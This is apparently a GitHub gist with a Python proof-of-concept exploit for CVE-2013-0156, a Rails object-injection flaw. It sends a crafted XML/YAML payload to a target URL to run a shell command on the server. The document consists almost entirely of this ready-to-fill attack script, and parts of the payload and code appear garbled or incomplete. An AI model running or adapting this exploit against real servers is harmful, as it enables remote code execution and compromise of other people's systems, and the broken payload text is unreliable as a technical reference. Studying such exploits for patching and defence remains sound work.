Skip to content

Instantly share code, notes, and snippets.

Created August 1, 2021 21:00
What would you like to do?
CVE-2013-0156: Rails Object Injection (Detailed POC)
Date: Monday, August 2, 2021
Description: CVE-2013-0156: Rails Object Injection (Detailed POC)
Created By: ShaFdo (twitter: @ShalindaFdo)
Dependencies: requests
Usage: ./
Additional Notes: Make sure you mark "" as an executable before running it :).
import requests
# -=-=-=-=-=-=- Edit Bellow -=-=-=-=-=-=-
host = "" # Target URL
command = "id > public/results.txt" # Command to execute
# -=-=-=-=-=-=- Edit Above -=-=-=-=-=-=-
# [INFO] Set the content-type header to text/xml to tell the server that we're sending stuff as XML.
request_headers = {
"Content-Type": "text/xml",
# [INFO] Injected the Ruby payload inside the XML (Payload source:
xml_payload = """
<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? |
`{}`;(RUBY; @executed = true) unless @executed
: !ruby/struct
:action: create
:controller: foos
required_parts: []
:action: create
:controller: foos
- :format
# [INFO] Send Request with appropriate headers & the XML payload attached to the HTTP body.
res = requests.get(host, data=xml_payload, headers=request_headers)
if(res.status_code == 200):
print("[+] Payload Executed Successfully")
print("[-] Got Error Code {} along the way.".format(res.status_code))
Copy link

shafdo commented Aug 1, 2021

A quick preview in burp:


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment